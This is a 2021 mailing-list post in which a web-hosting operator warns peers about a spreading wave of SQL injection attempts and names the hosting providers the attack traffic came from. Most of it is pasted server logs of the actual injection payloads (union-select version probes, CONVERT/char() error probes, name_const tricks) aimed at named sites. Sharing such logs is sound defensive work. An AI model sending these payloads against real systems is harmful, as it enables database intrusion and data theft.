[Hidden-tech] Growing Botnet?

Mon Feb 15 19:53:39 UTC 2021

Hey HT web hosts out there,

Due to recent hacking attempts against our servers, I have installed an 
IP Tracker that tracks and blocks any aggressive activity.

Starting late last week we've found a growing number of IP numbers that 
appear to be attempting SQL Injection attacks. I've pasted a few 
snippets from our logs, below.

Anyone else seeing this kind of activity on their servers? Every time I 
block an IP number they move to another IP number. The list of IPs 
hitting us is growing, and moving across multiple hosts.

So far, I've contacted four different server hosts about the traffic 
coming from their servers. By far the most "infected" appears to be the 
Unified Layer family of hosting companies, which includes HostGator 
Mexico, webhostbox Bigrock India, and a number of others. Additional 
sources of the attacks are Hetzner.com from Germany; Ozkula from Turkey; 
and ColoCrossing from Buffalo NY. I'm sure more will be added as the 
days go on.

Stay safe.

Mik

94.130.76.249 13:38:44 fitzgerald-realestate.com term=0 
/%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) 
94.130.76.249 13:38:45 fitzgerald-realestate.com term=0' /z'0=A 
94.130.76.249 13:38:47 fitzgerald-realestate.com /z 
term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33))) 
94.130.76.249 13:38:59 fitzgerald-realestate.com /z term=0%20AND%201=1 
94.130.76.249 13:39:01 fitzgerald-realestate.com /z 
term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 
94.130.76.249 13:39:03 fitzgerald-realestate.com /z 
term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x 
94.130.76.249 13:39:04 fitzgerald-realestate.com /z 
term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x 
94.130.76.249 13:39:06 fitzgerald-realestate.com /z 
term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1 
94.130.76.249 13:39:07 fitzgerald-realestate.com /z 
term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x 
94.130.76.249 13:39:09 fitzgerald-realestate.com /z 
term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x 

37.247.110.108 08:14:38 Greenfield-MA.gov /z term=Licensing%20AND%201=1 
37.247.110.108 08:14:42 Greenfield-MA.gov /z 
term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 
37.247.110.108 08:14:44 Greenfield-MA.gov /z 
term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x 
37.247.110.108 08:14:46 Greenfield-MA.gov /z 
term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x 

192.3.204.226 14:58:55 Greenfield-MA.gov /z term=Licensing 192.3.204.226 
14:58:56 Greenfield-MA.gov /z term=Licensing2121121121212/1 
192.3.204.226 14:58:57 Greenfield-MA.gov /z term=Licensing%20AND%201=1 
192.3.204.226 14:58:59 Greenfield-MA.gov /z 
term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1 
192.3.204.226 14:59:00 Greenfield-MA.gov /z 
term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x 

-- 
---
Mik Muller, president
Montague WebWorks
239-R Main Street, Greenfield, MA
413-320-5336
http://MontagueWebWorks.com
Powered by ROCKETFUSION

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.hidden-tech.net/pipermail/hidden-discuss/attachments/20210215/769c3be9/attachment.html>